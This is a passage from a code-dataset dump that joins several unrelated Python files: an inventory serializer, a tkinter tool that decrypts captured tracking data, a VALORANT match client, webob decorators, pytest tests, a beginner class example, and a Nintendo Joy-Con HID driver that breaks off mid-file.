FacilityInventoryItemTagSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = FacilityInventoryItemTag\n        read_only_fields = (\"id\",)\n        fields = \"__all__\"\n\n\nclass FacilityInventoryUnitSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = FacilityInventoryUnit\n        read_only_fields = (\"id\",)\n        fields = \"__all__\"\n\n\nclass FacilityInventoryItemSerializer(serializers.ModelSerializer):\n    default_unit = FacilityInventoryUnitSerializer()\n    allowed_units = FacilityInventoryUnitSerializer(many=True)\n    tags = FacilityInventoryItemTagSerializer(many=True)\n\n    class Meta:\n        model = FacilityInventoryItem\n        read_only_fields = (\"id\",)\n        fields = \"__all__\"
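\n\n\n# A FacilityInventoryLog entry either adds to (is_incoming) or subtracts from the\n# facility's running FacilityInventorySummary; quantities are normalized to the\n# item's default_unit through FacilityInventoryUnitConverter in create() below.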
\n\n\nclass FacilityInventoryLogSerializer(serializers.ModelSerializer):\n\n    id = serializers.UUIDField(source=\"external_id\", read_only=True)\n\n    item_object = FacilityInventoryItemSerializer(source=\"item\", required=False)\n    unit_object = FacilityInventoryUnitSerializer(source=\"unit\", required=False)\n\n    class Meta:\n        model = FacilityInventoryLog\n        read_only_fields = (\"id\", \"external_id\", \"created_by\")\n        exclude = (\n            \"deleted\",\n            \"modified_date\",\n            \"facility\",\n        )\n\n    def create(self, validated_data):\n\n        item = validated_data[\"item\"]\n        unit = validated_data[\"unit\"]\n\n        try:\n            item.allowed_units.get(id=unit.id)\n        except FacilityInventoryUnit.DoesNotExist:\n            raise serializers.ValidationError({\"unit\": [\"Item cannot be measured with unit\"]})\n\n        multiplier = 1\n\n        try:\n            if item.default_unit != unit:\n                multiplier = FacilityInventoryUnitConverter.objects.get(\n                    from_unit=unit, to_unit=item.default_unit\n                ).multiplier\n        except FacilityInventoryUnitConverter.DoesNotExist:\n            raise serializers.ValidationError({\"item\": [\"Please Ask Admin to Add Conversion Metrics\"]})\n\n        validated_data[\"created_by\"] = self.context[\"request\"].user\n\n        if not validated_data[\"is_incoming\"]:\n            multiplier *= -1\n\n        summary_obj = None\n        current_min_quantity = item.min_quantity\n        current_quantity = multiplier * validated_data[\"quantity\"]\n        try:\n            summary_obj = FacilityInventorySummary.objects.get(facility=validated_data[\"facility\"], item=item)\n            current_quantity = summary_obj.quantity + (multiplier * validated_data[\"quantity\"])\n            summary_obj.quantity = F(\"quantity\") + (multiplier * validated_data[\"quantity\"])\n        except FacilityInventorySummary.DoesNotExist:\n            summary_obj = FacilityInventorySummary(\n                facility=validated_data[\"facility\"], item=item, quantity=multiplier * validated_data[\"quantity\"]\n            )\n\n        try:\n            current_min_quantity = FacilityInventoryMinQuantity.objects.get(\n                facility=validated_data[\"facility\"], item=item\n            ).min_quantity\n        except FacilityInventoryMinQuantity.DoesNotExist:\n            pass\n\n        summary_obj.is_low = current_quantity < current_min_quantity\n\n        instance = super().create(validated_data)\n        summary_obj.save()\n\n        return instance\n\n\nclass FacilityInventorySummarySerializer(serializers.ModelSerializer):\n    id = serializers.UUIDField(source=\"external_id\", read_only=True)\n\n    item_object = FacilityInventoryItemSerializer(source=\"item\", required=False)\n    unit_object = FacilityInventoryUnitSerializer(source=\"unit\", required=False)\n\n    class Meta:\n        model = FacilityInventorySummary\n        read_only_fields = (\"id\", \"item\", \"unit\")\n        exclude = (\n            \"external_id\",\n            \"deleted\",\n            \"modified_date\",\n            \"facility\",\n        )\n\n\nclass FacilityInventoryMinQuantitySerializer(serializers.ModelSerializer):\n    id = serializers.UUIDField(source=\"external_id\", read_only=True)\n\n    item_object = FacilityInventoryItemSerializer(source=\"item\", required=False)\n\n    class Meta:\n        model = FacilityInventoryMinQuantity\n        read_only_fields = (\"id\", \"unit\")\n        exclude = (\n            \"external_id\",\n            \"deleted\",\n            \"modified_date\",\n            \"facility\",\n        )\n\n    def create(self, validated_data):\n        item = validated_data[\"item\"]\n\n        if not item:\n            raise serializers.ValidationError({\"item\": [\"Item cannot be Null\"]})\n\n        try:\n            instance = super().create(validated_data)\n        except IntegrityError:\n            raise serializers.ValidationError({\"item\": [\"Item min quantity already set\"]})\n\n        try:\n            summary_obj = FacilityInventorySummary.objects.get(facility=validated_data[\"facility\"], item=item)\n            summary_obj.is_low = summary_obj.quantity < validated_data[\"min_quantity\"]\n            summary_obj.save()\n        except FacilityInventorySummary.DoesNotExist:\n            pass\n\n        return instance\n\n    def update(self, instance, 
validated_data):\n\n        if \"item\" in validated_data:\n            if instance.item != validated_data[\"item\"]:\n                raise serializers.ValidationError({\"item\": [\"Item cannot be Changed\"]})\n\n        item = validated_data[\"item\"]\n\n        try:\n            summary_obj = FacilityInventorySummary.objects.get(facility=instance.facility, item=item)\n            summary_obj.is_low = summary_obj.quantity < validated_data[\"min_quantity\"]\n            summary_obj.save()\n        except FacilityInventorySummary.DoesNotExist:\n            pass\n\n        return super().update(instance, validated_data)\n","repo_name":"ajmalhassan/care","sub_path":"care/facility/api/serializers/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"10377986672","text":"#coding:utf-8\nimport json\nimport tkinter\nfrom tkinter import *\nimport time\nfrom codes.decrypt import aesDecrypt\n\nLOG_LINE_NUM = 0\nDECRYPT_PASSWD = 'neteasemobiledat'\n\nclass decrypt_frame(object):\n    def __init__(self,init_tk_object):\n        self.init_tk_object = init_tk_object\n        self.init_tk_object.resizable(0,0)\n        screen_width_x = str(int(self.init_tk_object.winfo_screenwidth()/2) - 500)\n        screen_height_y = str(int(self.init_tk_object.winfo_screenheight()/2) - 300)\n        screen_init_str = r'1024x670' + r'+' + screen_width_x + r'+' + screen_height_y\n        self.init_tk_object.geometry(screen_init_str)\n        self.init_tk_object.title('银河埋点抓拆包工具')  # 'Galaxy tracking capture/unpack tool'\n        # self.init_tk_object['bg'] = 'DEEPSKYBLUE'\n        # self.init_tk_object.attributes('-alpha',0.618)  # translucent window\n        # labels\n        self.init_data_label = Label(self.init_tk_object, text='待解密数据',font=('楷体',10, 'bold'))\n        self.init_data_label.grid(row=0, column=0)\n        self.result_data_label = Label(self.init_tk_object, text='解密结果',font=('楷体',10, 'bold'))\n        self.result_data_label.grid(row=0, column=12)\n        self.log_label = Label(self.init_tk_object, text='日志',font=('楷体',10, 'bold'))\n        self.log_label.grid(row=12, column=0)\n        # text boxes\n        self.init_data_Text = Text(self.init_tk_object, width=67, height=35)  # box for the raw data to decrypt\n        self.init_data_Text.grid(row=1, column=0, rowspan=10, columnspan=10)\n        self.result_data_Text = Text(self.init_tk_object, width=70, height=49)  # box showing the decrypted result\n        self.result_data_Text.grid(row=1, column=12, rowspan=15, columnspan=10)\n        self.log_data_Text = Text(self.init_tk_object, width=66, height=9)  # log box\n        self.log_data_Text.grid(row=13, column=0, columnspan=10)\n        # buttons\n        self.aes_trans_to_str_button = Button(self.init_tk_object, text='解密', bg='lightblue',font=('楷体',15, 'bold'), width=10,command=self.aes_trans_to_str)  # pass the bound method itself; adding () would call it immediately\n        self.aes_trans_to_str_button.grid(row=1, column=11)\n    # button events for returning to the proxy frame\n    def show_root_window(self):\n        self.init_tk_object.update()\n        self.init_tk_object.deiconify()\n    def close_other_frame(self, frame):\n        # self.init_tk_object.destroy\n        # frame.destroy()\n        self.show_root_window()\n    # helper functions\n    def aes_trans_to_str(self):\n        aes_string = str(self.init_data_Text.get(1.0,END)).replace(' ','').encode('utf8')\n        if aes_string:\n            try:\n                decrypt_res = aesDecrypt(DECRYPT_PASSWD, aes_string)\n                if '{' not in decrypt_res:\n                    pass  # not JSON; show the raw decrypted text as-is\n                else:\n                    middle_json = json.loads(decrypt_res)\n                    decrypt_res = json.dumps(middle_json, sort_keys=True, indent=2,ensure_ascii=False)\n                # write the result to the UI\n                self.result_data_Text.delete(1.0,END)  # clear previous content\n                self.result_data_Text.insert(1.0,decrypt_res)\n                self.write_log_to_Text('INFO:aes_trans_to_str success')\n            except Exception:\n                self.result_data_Text.delete(1.0,END)\n                self.result_data_Text.insert(1.0,'字符串解密失败')  # 'string decryption failed'\n        else:\n            self.write_log_to_Text('ERROR:aes_trans_to_str failed')\n\n    # get the current time\n    def get_current_time(self):
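\n        \"\"\"Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'.\"\"\"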
\n        current_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n        return current_time\n\n    # append to the log box, keeping it to a rolling window of lines\n    def write_log_to_Text(self,logmsg):\n        global LOG_LINE_NUM\n        current_time = self.get_current_time()\n        logmsg_in = str(current_time) +' ' + str(logmsg) + '\\n'\n        if LOG_LINE_NUM <= 7:\n            self.log_data_Text.insert(END, logmsg_in)\n            LOG_LINE_NUM = LOG_LINE_NUM + 1\n        else:\n            self.log_data_Text.delete(1.0,2.0)\n            self.log_data_Text.insert(END, logmsg_in)\n# init_window = tkinter.Tk()\n# decrypt_frame_ = decrypt_frame(init_window)\n# init_window.mainloop()","repo_name":"BigdataZjk/ProxyServer","sub_path":"src/gui_codes/decrypt_frame.py","file_name":"decrypt_frame.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71062767561","text":"import time\n\n\nclass Coregame:\n    def __init__(self, Requests, log):\n        self.log = log\n\n        self.Requests = Requests\n\n        self.response = \"\"\n\n    def get_coregame_match_id(self):\n        try:\n            self.response = self.Requests.fetch(url_type=\"glz\",\n                                                endpoint=f\"/core-game/v1/players/{self.Requests.puuid}\",\n                                                method=\"get\")\n            if self.response.get(\"errorCode\") == \"RESOURCE_NOT_FOUND\":\n                return 0\n            match_id = self.response['MatchID']\n            self.log(f\"retrieved coregame match id: '{match_id}'\")\n            return match_id\n        except (KeyError, TypeError):\n            self.log(\"cannot find coregame match id, retrying once\")\n            # print(f\"No match id found. {self.response}\")\n            time.sleep(5)\n            try:\n                self.response = self.Requests.fetch(url_type=\"glz\",\n                                                    endpoint=f\"/core-game/v1/players/{self.Requests.puuid}\",\n                                                    method=\"get\")\n                match_id = self.response['MatchID']\n                self.log(f\"retrieved coregame match id: '{match_id}'\")\n                return match_id\n            except (KeyError, TypeError):\n                self.log(\"cannot find coregame match id\")\n                print(f\"No match id found. 
{self.response}\")\n return 0\n\n def get_coregame_stats(self):\n self.match_id = self.get_coregame_match_id()\n if self.match_id != 0:\n return self.Requests.fetch(url_type=\"glz\",\n endpoint=f\"/core-game/v1/matches/{self.match_id}\",\n method=\"get\")\n else:\n return None\n\n def get_current_map(self, map_urls, map_splashes) -> dict:\n \"\"\"\n Abstracts get_coregame_stats() to get the current map name and splash.\n :return: Dictionary of appropriate name and splash.\n \"\"\"\n coregame_stats = self.get_coregame_stats()\n\n if coregame_stats is None:\n return 'N/A'\n\n current_map = map_urls.get(coregame_stats['MapID'].lower())\n return {'name': current_map, 'splash': map_splashes[current_map]}\n","repo_name":"zayKenyon/VALORANT-rank-yoinker","sub_path":"src/states/coregame.py","file_name":"coregame.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":384,"dataset":"github-code","pt":"63"} +{"seq_id":"7240166318","text":"from webob import Request, Response\nfrom webob import exc\n\ndef controller(func):\n def _wrapper(environ, start_response):\n req = Request(environ)\n try:\n resp = func(req, **req.urlvars)\n except exc.HTTPException as e:\n resp = e\n if isinstance(resp, basestring):\n resp = Response(body=resp)\n return resp(environ, start_response)\n return _wrapper\n\ndef rest_controller(cls):\n def _wrapper(environ, start_response):\n req = Request(environ)\n try:\n controller = cls(req)\n action = req.urlvars.get('action')\n if action:\n action += '_' + req.method.lower()\n else:\n action = req.method.lower()\n try:\n method = getattr(controller, action)\n except AttributeError:\n raise exc.HTTPNotFound('No action %s' % action)\n resp = method(req, **req.urlvars)\n except exc.HTTPException as e:\n resp = e\n if not isinstance(resp, Response):\n resp = Response(body=unicode(resp))\n return resp(environ, start_response)\n return _wrapper\n","repo_name":"samsong8610/diyframework","sub_path":"diyfx/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6902654628","text":"# -*- coding: utf-8 -*-\n\n# #!/usr/bin/python\n#\n# nl_lib Testing\n#\n__author__ = u'morrj140'\n__VERSION__ = u'0.2'\n\nfrom Logger import *\nlogger = setupLogging(__name__)\nlogger.setLevel(INFO)\n\nimport pytest\nfrom test_Constants import *\n\nfrom Concepts import Concepts\n\n@pytest.fixture(scope=u\"module\")\ndef cleandir():\n cwd = os.getcwd()\n\n listFiles = list()\n listFiles.append(exportFileTest)\n\n for lf in listFiles:\n ftr = cwd + os.sep + u\"test\" + os.sep + lf\n\n if os.path.exists(ftr):\n logger.info(u\"remove : %s\" % ftr)\n os.remove(ftr)\n\n\ndef setup():\n key = u\"key\"\n value = u\"value\"\n\n c = Concepts(key, value)\n assert (c.name == key)\n assert (c.typeName == value)\n\n d = c.addConceptKeyType(key, value)\n assert (c.count == 1)\n assert (d.name == key)\n assert (d.typeName == value)\n\n e = d.addConceptKeyType(key, value)\n assert (d.count == 1)\n assert (e.name == key)\n assert (e.typeName == value)\n\n e = d.addConceptKeyType(key, value)\n assert (e.count == 0)\n\n return key, value, c\n\n@pytest.mark.Concepts\ndef test_Concepts(cleandir):\n logger.info(\"%s\" % __name__)\n\n key, value, c = setup()\n\n logger.info(u\"Using : %s\" % exportFileTest)\n\n Concepts.saveConcepts(c, exportFileTest)\n\n assert (os.path.isfile(exportFileTest))\n\n@pytest.mark.Concepts\ndef 
test_Concepts_Props(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n d = dict()\n d[key] = value\n\n c.setProperties(d)\n\n nd = c.getProperties()\n\n assert(nd[key] == value)\n\n@pytest.mark.Concepts\ndef test_concepts_dict(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n d = c.dictChildrenType(value)\n\n assert(d is not None)\n assert(len(d) > 0)\n assert(len(d) == 1)\n\n@pytest.mark.Concepts\ndef test_sorted_concepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n sc = c.sortConcepts(value)\n\n assert(sc is not None)\n assert(isinstance(sc, list))\n assert(len(sc) > 0)\n assert(len(sc) == 1)\n\n@pytest.mark.Concepts\ndef test_listCSVConcepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n sc = c.listCSVConcepts()\n\n assert(sc is not None)\n assert(isinstance(sc, list))\n assert(len(sc) > 0)\n assert(len(sc) == 3)\n\n@pytest.mark.Concepts\ndef test_addConcept(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n dkey = u\"nd\"\n dvalue = u\"ndt\"\n\n d = Concepts(dkey, dvalue)\n\n c.addConcept(d)\n cd = c.getConcepts()\n ck = c.getConcepts().keys()\n cv = c.getConcepts().values()\n\n assert(cv is not None)\n assert(isinstance(cv, list))\n assert(d.name == cd[dkey].name)\n assert(d.count == cd[dkey].count)\n\n@pytest.mark.Concepts\ndef test_addListConcepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n listConcepts = list()\n listConcepts.append(Concepts(u\"a\", u\"b\"))\n listConcepts.append(Concepts(u\"c\", u\"d\"))\n listConcepts.append(Concepts(u\"e\", u\"f\"))\n\n c.addListConcepts(listConcepts)\n\n cd = c.getConcepts()\n\n assert(cd is not None)\n assert(len(cd) > 0)\n assert(len(cd) == 4)\n\n\n@pytest.mark.Concepts\ndef test_clean_concepts(cleandir):\n logger.info(\"%s\" % __name__)\n key, value, c = setup()\n\n assert (c is not None)\n\n c.logConcepts()\n\n assert(c is not None)\n\n c.logConcepts()\n\nif __name__ == u\"__main__\":\n clean_dir = os.getcwd()\n test_Concepts(clean_dir)\n test_clean_concepts(cleandir)\n test_addListConcepts(cleandir)\n test_addListConcepts(cleandir)\n test_sorted_concepts(cleandir)\n test_concepts_dict(cleandir)\n test_Concepts_Props(cleandir)","repo_name":"Darth-Neo/nl_lib","sub_path":"nl_lib/test_Concepts.py","file_name":"test_Concepts.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"74173155399","text":"class celular: \n marca = \"\"\n color = \"\"\n modelo = \"\"\n prendido = False \n volumen = 0\n\n\n def __init__(self, marca, color, modelo):\n self. marca = marca\n self. color = color\n self. 
modelo = modelo\n\n def prender (self):\n self.prendido = True \n\n def set_volumen(self, volumen):\n self.volumen = volumen \n\n\ncelular1 = celular(\"samsung\",\"negro\", \"galaxy s21 ultra\")\ncelular1.color = \"blanco\"\ncelular1.prender ()\ncelular1.set_volumen(10) \nprint(f'marca: {celular1.marca}, color: {celular1.color}, modelo: {celular1.modelo}')\n\nif celular1.prendido:\n print(f'el celular esta prendido y su volumen es {celular1.volumen}')\n celular1.set_volumen(8) \n print(f'el celular esta prendido y su volumen es {celular1.volumen}')\nelse:\n print ('el celular esta apagado')\n\n","repo_name":"FedeDiStefano/Python","sub_path":"Curso de Python/curso de principiante/celulares/objetos.py","file_name":"objetos.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"40461031475","text":"import time\nfrom threading import Thread\nfrom typing import Optional, Tuple\n\nimport hid\n\nfrom .constants import (JOYCON_L_PRODUCT_ID, JOYCON_PRODUCT_IDS,\n JOYCON_R_PRODUCT_ID, JOYCON_VENDOR_ID)\n\n# TODO: disconnect, power off sequence\n\n\nclass JoyCon:\n _INPUT_REPORT_SIZE = 49\n _INPUT_REPORT_PERIOD = 0.015\n _RUMBLE_DATA = b'\\x00\\x01\\x40\\x40\\x00\\x01\\x40\\x40'\n\n vendor_id: int\n product_id: int\n serial: Optional[str]\n simple_mode: bool\n color_body: Tuple[int, int, int]\n color_btn: Tuple[int, int, int]\n stick_cal: Tuple[int, int, int, int, int, int, int, int]\n\n def __init__(self, vendor_id: int, product_id: int, serial: str = None, simple_mode=False):\n if vendor_id != JOYCON_VENDOR_ID:\n raise ValueError(f'vendor_id is invalid: {vendor_id!r}')\n\n if product_id not in JOYCON_PRODUCT_IDS:\n raise ValueError(f'product_id is invalid: {product_id!r}')\n\n self.vendor_id = vendor_id\n self.product_id = product_id\n self.serial = serial\n self.simple_mode = simple_mode # TODO: It's for reporting mode 0x3f\n\n # setup internal state\n self._input_hooks = []\n self._input_report = bytes(self._INPUT_REPORT_SIZE)\n self._packet_number = 0\n self.set_accel_calibration((0, 0, 0), (1, 1, 1))\n\n # connect to joycon\n self._joycon_device = self._open(vendor_id, product_id, serial=serial)\n self._read_joycon_data()\n self._setup_sensors()\n\n # start talking with the joycon in a daemon thread\n Thread(target=self._update_input_report, daemon=True).start()\n\n def _open(self, vendor_id, product_id, serial):\n try:\n if hasattr(hid, \"device\"): # hidapi\n _joycon_device = hid.device()\n _joycon_device.open(vendor_id, product_id, serial)\n elif hasattr(hid, \"Device\"): # hid\n _joycon_device = hid.Device(vendor_id, product_id, serial)\n else:\n raise Exception(\"Implementation of hid is not recognized!\")\n except IOError as e:\n raise IOError('joycon connect failed') from e\n return _joycon_device\n\n def _close(self):\n if self._joycon_device:\n self._joycon_device.close()\n self._joycon_device = None\n\n def _read_input_report(self) -> bytes:\n if self._joycon_device:\n return bytes(self._joycon_device.read(self._INPUT_REPORT_SIZE))\n\n def _write_output_report(self, command, subcommand, argument):\n if not self._joycon_device:\n return\n\n # TODO: add documentation\n self._joycon_device.write(b''.join([\n command,\n self._packet_number.to_bytes(1, byteorder='little'),\n self._RUMBLE_DATA,\n subcommand,\n argument,\n ]))\n self._packet_number = (self._packet_number + 1) & 0xF\n\n def _send_subcmd_get_response(self, subcommand, argument) -> Tuple[bool, bytes]:\n # TODO: handle subcmd when 
daemon is running\n        self._write_output_report(b'\\x01', subcommand, argument)\n\n        report = [0]\n        while report[0] != 0x21:  # TODO, avoid this, await daemon instead\n            report = self._read_input_report()\n\n        # TODO, remove, see the todo above\n        assert report[1:2] != subcommand, \"THREAD carefully\"\n\n        # TODO: determine if the cut bytes are worth anything\n\n        return report[13] & 0x80, report[13:]  # (ack, data)\n\n    def _spi_flash_read(self, address, size) -> bytes:\n        assert size <= 0x1d\n        argument = address.to_bytes(4, \"little\") + size.to_bytes(1, \"little\")\n        ack, report = self._send_subcmd_get_response(b'\\x10', argument)\n        if not ack:\n            raise IOError(f\"After SPI read @ {address:#06x}: got NACK\")\n\n        if report[:2] != b'\\x90\\x10':\n            raise IOError(\"Something else than the expected ACK was received!\")\n        assert report[2:7] == argument, (report[2:5], argument)\n\n        return report[7:size + 7]\n\n    def _update_input_report(self):  # daemon thread\n        try:\n            while self._joycon_device:\n                report = [0]\n                # TODO, handle input reports of type 0x21 and 0x3f\n                while report[0] != 0x30:\n                    report = self._read_input_report()\n\n                self._input_report = report\n\n                # Call input hooks in a different thread\n                Thread(target=self._input_hook_caller, daemon=True).start()\n        except OSError:\n            print('connection closed')\n\n    def _input_hook_caller(self):\n        for callback in self._input_hooks:\n            callback(self)\n\n    def _read_joycon_data(self):\n        color_data = self._spi_flash_read(0x6050, 6)\n        self.color_body = tuple(color_data[:3])\n        self.color_btn = tuple(color_data[3:])\n\n        self._read_stick_calibration_data()\n\n        buf = self._spi_flash_read(0x6086 if self.is_left() else 0x6098, 16)\n        self.deadzone = (buf[4] << 8) & 0xF00 | buf[3]\n\n        # user IMU calibration data\n        if self._spi_flash_read(0x8026, 2) == b\"\\xB2\\xA1\":\n            # print(f\"Calibrate {self.serial} IMU with user data\")\n            imu_cal = self._spi_flash_read(0x8028, 24)\n\n        # factory IMU calibration data\n        else:\n            # print(f\"Calibrate {self.serial} IMU with factory data\")\n            imu_cal = self._spi_flash_read(0x6020, 24)\n\n        self.set_accel_calibration((\n            self._to_int16le_from_2bytes(imu_cal[0], imu_cal[1]),\n            self._to_int16le_from_2bytes(imu_cal[2], imu_cal[3]),\n            self._to_int16le_from_2bytes(imu_cal[4], imu_cal[5]),\n        ), (\n            self._to_int16le_from_2bytes(imu_cal[6], imu_cal[7]),\n            self._to_int16le_from_2bytes(imu_cal[8], imu_cal[9]),\n            self._to_int16le_from_2bytes(imu_cal[10], imu_cal[11]),\n        ))\n\n    def _read_stick_calibration_data(self):\n        user_stick_cal_addr = 0x8012 if self.is_left() else 0x801D\n        buf = self._spi_flash_read(user_stick_cal_addr, 9)\n        use_user_data = False\n\n        for b in buf:\n            if b != 0xFF:\n                use_user_data = True\n                break\n\n        if not use_user_data:\n            factory_stick_cal_addr = 0x603D if self.is_left() else 0x6046\n            buf = self._spi_flash_read(factory_stick_cal_addr, 9)\n\n        self.stick_cal = [0] * 6\n\n        # X Axis Max above center\n        self.stick_cal[0 if self.is_left() else 2] = (buf[1] << 8) & 0xF00 | buf[0]\n        # Y Axis Max above center\n        self.stick_cal[1 if self.is_left() else 3] = (buf[2] << 4) | (buf[1] >> 4)\n        # X Axis Center\n        self.stick_cal[2 if self.is_left() else 4] = (buf[4] << 8) & 0xF00 | buf[3]\n        # Y Axis Center\n        self.stick_cal[3 if self.is_left() else 5] = (buf[5] << 4) | (buf[4] >> 4)\n        # X Axis Min below center\n        self.stick_cal[4 if self.is_left() else 0] = (buf[7] << 8) & 0xF00 | buf[6]\n        # Y Axis Min below center\n        self.stick_cal[5 if self.is_left() else 1] = (buf[8] << 4) | (buf[7] >> 4)\n\n    def _setup_sensors(self):\n        # Enable 6 axis sensors
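\n        # (note, per public reverse-engineering of the Switch HID protocol:\n        # subcommand 0x40 with argument 0x01 powers the IMU on, and subcommand\n        # 0x03 with argument 0x30 selects the full 60 Hz input-report format\n        # that _update_input_report() waits for)\n        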
self._write_output_report(b'\\x01', b'\\x40', b'\\x01')\n # It needs delta time to update the setting\n time.sleep(0.02)\n # Change format of input report\n self._write_output_report(b'\\x01', b'\\x03', b'\\x30')\n\n @staticmethod\n def _to_int16le_from_2bytes(hbytebe, lbytebe):\n uint16le = (lbytebe << 8) | hbytebe\n int16le = uint16le if uint16le < 32768 else uint16le - 65536\n return int16le\n\n def _get_nbit_from_input_report(self, offset_byte, offset_bit, nbit):\n byte = self._input_report[offset_byte]\n return (byte >> offset_bit) & ((1 << nbit) - 1)\n\n def __del__(self):\n self._close()\n\n def set_accel_calibration(self, offset_xyz=None, coeff_xyz=None):\n if offset_xyz and coeff_xyz:\n self._ACCEL_OFFSET_X, self._ACCEL_OFFSET_Y, self._ACCEL_OFFSET_Z = offset_xyz\n\n cx, cy, cz = coeff_xyz\n self._ACCEL_COEFF_X = (1.0 / (cx - self._ACCEL_OFFSET_X)) * 4.0\n self._ACCEL_COEFF_Y = (1.0 / (cy - self._ACCEL_OFFSET_Y)) * 4.0\n self._ACCEL_COEFF_Z = (1.0 / (cz - self._ACCEL_OFFSET_Z)) * 4.0\n\n def get_actual_stick_value(self, pre_cal, orientation): # X/Horizontal = 0, Y/Vertical = 1\n diff = pre_cal - self.stick_cal[2 + orientation]\n if (abs(diff) < self.deadzone):\n return 0\n elif diff > 0: # Axis is above center\n return diff / self.stick_cal[orientation]\n else:\n return diff / self.stick_cal[4 + orientation]\n\n def register_update_hook(self, callback):\n self._input_hooks.append(callback)\n return callback # this makes it so you could use it as a decorator\n\n def is_left(self):\n return self.product_id == JOYCON_L_PRODUCT_ID\n\n def is_right(self):\n return self.product_id == JOYCON_R_PRODUCT_ID\n\n def get_battery_charging(self):\n return self._get_nbit_from_input_report(2, 4, 1)\n\n def get_battery_level(self):\n return self._get_nbit_from_input_report(2, 5, 3)\n\n def get_button_y(self):\n return self._get_nbit_from_input_report(3, 0, 1)\n\n def get_button_x(self):\n return self._get_nbit_from_input_report(3, 1, 1)\n\n def get_button_b(self):\n return self._get_nbit_from_input_report(3, 2, 1)\n\n def get_button_a(self):\n return self._get_nbit_from_input_report(3, 3, 1)\n\n def get_button_right_sr(self):\n return self._get_nbit_from_input_report(3, 4, 1)\n\n def get_button_right_sl(self):\n return self._get_nbit_from_input_report(3, 5, 1)\n\n def get_button_r(self):\n return self._get_nbit_from_input_report(3, 6, 1)\n\n def get_button_zr(self):\n return self._get_nbit_from_input_report(3, 7, 1)\n\n def get_button_minus(self):\n return self._get_nbit_from_input_report(4, 0, 1)\n\n def get_button_plus(self):\n return self._get_nbit_from_input_report(4, 1, 1)\n\n def get_button_r_stick(self):\n return self._get_nbit_from_input_report(4, 2, 1)\n\n def get_button_l_stick(self):\n return self._get_nbit_from_input_report(4, 3, 1)\n\n def get_button_home(self):\n return self._get_nbit_from_input_report(4, 4, 1)\n\n def get_button_capture(self):\n return self._get_nbit_from_input_report(4, 5, 1)\n\n def get_button_charging_grip(self):\n return self._get_nbit_from_input_report(4, 7, 1)\n\n def get_button_down(self):\n return self._get_nbit_from_input_report(5, 0, 1)\n\n def get_button_up(self):\n return self._get_nbit_from_input_report(5, 1, 1)\n\n def get_button_right(self):\n return self._get_nbit_from_input_report(5, 2, 1)\n\n def get_button_left(self):\n return self._get_nbit_from_input_report(5, 3, 1)\n\n def get_button_left_sr(self):\n return self._get_nbit_from_input_report(5, 4, 1)\n\n def get_button_left_sl(self):\n return self._get_nbit_from_input_report(5, 5, 1)\n\n def 
get_button_l(self):\n return self._get_nbit_from_input_report(5, 6, 1)\n\n def get_button_zl(self):\n return self._get_nbit_from_input_report(5, 7, 1)\n\n def get_stick_left_horizontal(self):\n if not self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(6, 0, 8) \\\n | (self._get_nbit_from_input_report(7, 0, 4) << 8)\n return self.get_actual_stick_value(pre_cal, 0)\n\n def get_stick_left_vertical(self):\n if not self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(7, 4, 4) \\\n | (self._get_nbit_from_input_report(8, 0, 8) << 4)\n return self.get_actual_stick_value(pre_cal, 1)\n\n def get_stick_right_horizontal(self):\n if self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(9, 0, 8) \\\n | (self._get_nbit_from_input_report(10, 0, 4) << 8)\n return self.get_actual_stick_value(pre_cal, 0)\n\n def get_stick_right_vertical(self):\n if self.is_left():\n return 0\n\n pre_cal = self._get_nbit_from_input_report(10, 4, 4) \\\n | (self._get_nbit_from_input_report(11, 0, 8) << 4)\n return self.get_actual_stick_value(pre_cal, 1)\n\n def get_accels(self):\n input_report = bytes(self._input_report)\n accels = []\n\n for idx in range(3):\n x = self.get_accel_x(input_report, sample_idx=idx)\n y = self.get_accel_y(input_report, sample_idx=idx)\n z = self.get_accel_z(input_report, sample_idx=idx)\n accels.append((x, y, z))\n\n return accels\n\n def get_accel_x(self, input_report=None, sample_idx=0):\n if not input_report:\n input_report = self._input_report\n\n if sample_idx not in (0, 1, 2):\n raise IndexError('sample_idx should be between 0 and 2')\n data = self._to_int16le_from_2bytes(\n input_report[13 + sample_idx * 12],\n input_report[14 + sample_idx * 12])\n return data * self._ACCEL_COEFF_X\n\n def get_accel_y(self, input_report=None, sample_idx=0):\n if not input_report:\n input_report = self._input_report\n\n if sample_idx not in (0, 1, 2):\n raise IndexError('sample_idx should be between 0 and 2')\n data = self._to_int16le_from_2bytes(\n input_report[15 + sample_idx * 12],\n input_report[16 + sample_idx * 12])\n return data * self._ACCEL_COEFF_Y * (1 if self.is_left() else -1)\n\n def get_accel_z(self, input_report=None, sample_idx=0):\n if not input_report:\n input_report = self._input_report\n\n if sample_idx not in (0, 1, 2):\n raise IndexError('sample_idx should be between 0 and 2')\n data = self._to_int16le_from_2bytes(\n input_report[17 + sample_idx * 12],\n input_report[18 + sample_idx * 12])\n return data * self._ACCEL_COEFF_Z * (1 if 